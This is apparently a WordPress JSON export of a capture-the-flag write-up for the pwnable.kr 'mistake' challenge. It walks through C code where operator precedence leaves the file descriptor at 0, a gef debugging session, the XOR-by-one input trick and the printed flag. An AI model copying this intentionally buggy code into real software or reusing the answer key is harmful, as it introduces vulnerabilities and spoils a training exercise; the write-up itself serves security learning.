{"id":3254,"date":"2025-04-06T09:02:40","date_gmt":"2025-04-06T00:02:40","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3254"},"modified":"2025-04-06T09:02:55","modified_gmt":"2025-04-06T00:02:55","slug":"mistake","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3254","title":{"rendered":"mistake"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">We all make mistakes, let's move on.\n(don't take this too seriously, no fancy hacking skill is required at all)\nThis task is based on real event\n\nssh mistake@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>mistake.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;fcntl.h>\n#include &lt;unistd.h>   \/\/ read, close, sleep, setregid, getegid\n#include &lt;string.h>   \/\/ strncmp\n#include &lt;stdlib.h>   \/\/ system\n#include &lt;time.h>     \/\/ time\n\n#define PW_LEN 10\n#define XORKEY 1\n\n\/\/ XOR every byte of s with XORKEY\nvoid xor(char* s, int len){\n\tint i;\n\tfor(i=0; i&lt;len; i++){\n\t\ts[i] ^= XORKEY;\n\t}\n}\n\nint main(int argc, char* argv[]){\n\t\n\tint fd;\n\t\/\/ intended bug: &lt; binds tighter than =, so fd receives (open(...) &lt; 0), which is 0 when open succeeds\n\tif(fd=open(\"\/home\/mistake\/password\",O_RDONLY,0400) &lt; 0){\n\t\tprintf(\"can't open password %d\\n\", fd);\n\t\treturn 0;\n\t}\n\n\tprintf(\"do not bruteforce...\\n\");\n\tsleep(time(0)%20);\n\n\tchar pw_buf[PW_LEN+1];\n\tint len;\n\t\/\/ same precedence pattern: len receives (read(...) > 0), not the byte count\n\tif(!(len=read(fd,pw_buf,PW_LEN) > 0)){\n\t\tprintf(\"read error\\n\");\n\t\tclose(fd);\n\t\treturn 0;\t\t\n\t}\n\n\tchar pw_buf2[PW_LEN+1];\n\tprintf(\"input password : \");\n\tscanf(\"%10s\", pw_buf2);\n\n\t\/\/ xor your input\n\txor(pw_buf2, 10);\n\n\tif(!strncmp(pw_buf, pw_buf2, PW_LEN)){\n\t\tprintf(\"Password OK\\n\");\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\\n\");\n\t}\n\telse{\n\t\tprintf(\"Wrong Password\\n\");\n\t}\n\n\tclose(fd);\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<p>With a breakpoint set on strncmp, entering AAAAAAAAAA at the first prompt and BBBBBBBBBB at the second produces the following output in gef.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  r\nStarting program: \/home\/ubuntu\/pwnable.kr\/mistake\/mistake \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\/lib\/x86_64-linux-gnu\/libthread_db.so.1\".\ndo not bruteforce...\nAAAAAAAAAA\nBBBBBBBBBB\ninput password : \nBreakpoint 1, __strncmp_sse2 () at ..\/sysdeps\/x86_64\/strcmp.S:108\n108\t..\/sysdeps\/x86_64\/strcmp.S: No such file or directory.\n\n[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$rax   : 0x00007fffffffe482  \u2192  \"AAAAAAAAAA\"\n$rbx   : 0x0               \n$rcx   : 0x00007fffffffe48d  \u2192  \"CCCCCCCCCC\"\n$rdx   : 0xa               \n$rsp   : 0x00007fffffffe458  \u2192  0x0000555555555486  \u2192  &lt;main+0173> test eax, eax\n$rbp   : 0x00007fffffffe4b0  \u2192  0x0000000000000001\n$rsi   : 0x00007fffffffe48d  
\u2192  \"CCCCCCCCCC\"\n$rdi   : 0x00007fffffffe482  \u2192  \"AAAAAAAAAA\"\n$rip   : 0x00007ffff7e3f020  \u2192  &lt;__strncmp_sse2+0000> endbr64 \n$r8    : 0x0               \n$r9    : 0x00005555555596b0  \u2192  \"BBBBBBBBBB\\\\n\"\n$r10   : 0xffffffffffffff80\n$r11   : 0x0               \n$r12   : 0x00007fffffffe5c8  \u2192  0x00007fffffffe807  \u2192  \"\/home\/ubuntu\/pwnable.kr\/mistake\/mistake\"\n$r13   : 0x0000555555555313  \u2192  &lt;main+0000> endbr64 \n$r14   : 0x0000555555557d60  \u2192  0x0000555555555280  \u2192  &lt;__do_global_dtors_aux+0000> endbr64 \n$r15   : 0x00007ffff7ffd040  \u2192  0x00007ffff7ffe2e0  \u2192  0x0000555555554000  \u2192   jg 0x555555554047\n$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]\n$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0x00007fffffffe458\u2502+0x0000: 0x0000555555555486  \u2192  &lt;main+0173> test eax, eax\t \u2190 $rsp\n0x00007fffffffe460\u2502+0x0008: 0x00007fffffffe5c8  \u2192  0x00007fffffffe807  \u2192  \"\/home\/ubuntu\/pwnable.kr\/mistake\/mistake\"\n0x00007fffffffe468\u2502+0x0010: 0x0000000100000000\n0x00007fffffffe470\u2502+0x0018: 0x0000000000000000\n0x00007fffffffe478\u2502+0x0020: 0x0000000100000000\n0x00007fffffffe480\u2502+0x0028: 0x4141414141410000\n0x00007fffffffe488\u2502+0x0030: 0x4343430041414141 (\"AAAA\"?)\n0x00007fffffffe490\u2502+0x0038: 0x0043434343434343 
(\"CCCCCCC\"?)\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:64 \u2500\u2500\u2500\u2500\n   0x7ffff7e3f012 &lt;__strcmp_sse2_unaligned+02a2> ret    \n   0x7ffff7e3f013                  cs     nop WORD PTR [rax+rax*1+0x0]\n   0x7ffff7e3f01d                  nop    DWORD PTR [rax]\n \u2192 0x7ffff7e3f020 &lt;__strncmp_sse2+0000> endbr64 \n   0x7ffff7e3f024 &lt;__strncmp_sse2+0004> test   rdx, rdx\n   0x7ffff7e3f027 &lt;__strncmp_sse2+0007> je     0x7ffff7e40864 &lt;__strncmp_sse2+6212>\n   0x7ffff7e3f02d &lt;__strncmp_sse2+000d> cmp    rdx, 0x1\n   0x7ffff7e3f031 &lt;__strncmp_sse2+0011> je     0x7ffff7e40870 &lt;__strncmp_sse2+6224>\n   0x7ffff7e3f037 &lt;__strncmp_sse2+0017> mov    r11, rdx\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"mistake\", stopped 0x7ffff7e3f020 in __strncmp_sse2 (), reason: 
BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x7ffff7e3f020 \u2192 __strncmp_sse2()\n[#1] 0x555555555486 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n<p>The first argument to strncmp holds ten <code>A<\/code>s and the second holds ten <code>C<\/code>s, so the ten <code>B<\/code>s typed at the second prompt arrived <code>XORed with 1<\/code>.<\/p>\n\n\n\n<p>So at the second prompt, enter <code>@<\/code>, which is 0x41 XORed with 1.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> chr(ord('A') ^ 1)\n'@'<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Why?<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">if(fd=open(\"\/home\/mistake\/password\",O_RDONLY,0400) &lt; 0){<\/pre>\n\n\n\n<p><code>open(\"\/home\/mistake\/password\",O_RDONLY,0400)<\/code> returns a positive file descriptor.<\/p>\n\n\n\n<p>Because of operator precedence, the comparison (&lt;) is evaluated before the assignment: the value returned by open is compared with 0, that comparison is false, and so fd ends up as 0.<\/p>\n\n\n\n<p>Therefore the password is not read from the file; <br>it is read from standard input, where we can set it to anything we like.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">mistake@ubuntu:~$ .\/mistake\ndo not bruteforce...\nAAAAAAAAAA\ninput password : @@@@@@@@@@\nPassword OK\nMommy_the_0perator_priority_confuses_me<\/pre>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3254","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3254"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254\/revisions"}],"predecessor-version":[{"id":3255,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254\/revisions\/3255"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3254"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3254"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3254"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}